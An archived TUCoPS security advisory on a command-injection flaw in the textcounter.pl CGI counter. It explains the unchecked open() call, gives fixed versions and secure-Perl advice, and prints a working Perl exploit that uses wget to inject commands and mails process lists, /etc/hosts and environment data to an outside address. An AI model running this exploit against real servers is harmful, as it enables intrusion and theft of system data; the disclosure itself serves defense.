Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Apps :: tcounter.htm

Textcounter.pl - execute arbitrary code



Vulnerability

    textcounter.pl

Affected

    Systems running perl script above

Description

    Doru Petrescu found  following.  It  enables everybody to  execute
    commands on your system with  the same rights as the  user running
    this poorly-written prefabricated script for a properly-configured
    httpd.  You can find it at

	http://www.worldwidemart.com/scripts/

    The  counter   use  the   enviroment  variable   DOCUMENT_URI   to
    create/read/update a file where it  keeps the hit count. There  is
    NO test for shell metacharacters, so you can easily put  something
    evil, that will make PERL to execute it...  This is the two  lines
    responsible with the problem ...

	if (-e "$data_dir$count_page") {
	   open(COUNT,"$data_dir$count_page");
	 ....
	}

    Because of  the test  condition, the  attack have  to be  repeated
    twice to succeed. First time the condition is false and the tricky
    file gets created, and the second time, the condition is true  and
    our commands get executed.  Exloit follows.

    #!/usr/bin/perl

    $URL='http://dtp.kappa.ro/a/test.shtml';    # please _DO_ _modify_ this
    $EMAIL='pdoru@pop3.kappa.ro,root';          # please _DO_ _modify_ this


    if ($ARGV[0]) {
       $CMD=$ARGV[0];
    }else{
       $CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\|mail ${EMAIL} -sanothere_one";
    }

    $text="${URL}/;IFS=\8;${CMD};echo|";
    $text =~ s/ /\$\{IFS\}/g;

    #print "$text\n";

    system({"wget"} "wget", $text, "-O/dev/null");
    system({"wget"} "wget", $text, "-O/dev/null");
    #system({"lynx"} "lynx", $text);
    #system({"lynx"} "lynx", $text);     # if you don't have "wget"
					 # you can try with "Lynx"

Solution

    The new versions posted at my site come with the fixed source  and
    a small perl script called convert.pl which will update your  data
    filenames from v1.2 to  v1.2.1 (or v1.3 to  v1.3.1 if you use  the
    C++ version).  You can obtain the fixed versions at:

        (Perl) http://www.worldwidemart.com/scripts/textcounter.shtml
        (C++)  http://www.worldwidemart.com/scripts/C++/textcounter.shtml

    If you aim at safe Perl CGIs do following:

        (1) upgrade to Perl 5: Perl 4 has known security holes
        (2) use -T (taint) option of Perl: suspect data sources  abort
            the script
        (3) use -w and "use strict;" to catch other bugs
        (4) Perl 5 has oodles of ready CGI modules, some of which  you
            can use as-is and  some as building blocks:  leverage from
            existing codebase
        (5) with  perl5  comes  doc  page  called perlsec that  tells,
            ta-dah, about writing secure Perl
        (6) you can be really paranoid with Perl 5 module called  Safe
            in which you can limit the operations the Perl script  can
            do:   e.g.   it cannot  do any  file I/O  or you  can trap
            operations  (for  example  to  check  for their arguments'
            sanity):  the Perl script is run in a "safe  compartment",
            sort of chroot() for "Perl op hierarchy".

    So, go to:

        http://www.perl.com/CPAN/src/latest.tar.gz


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH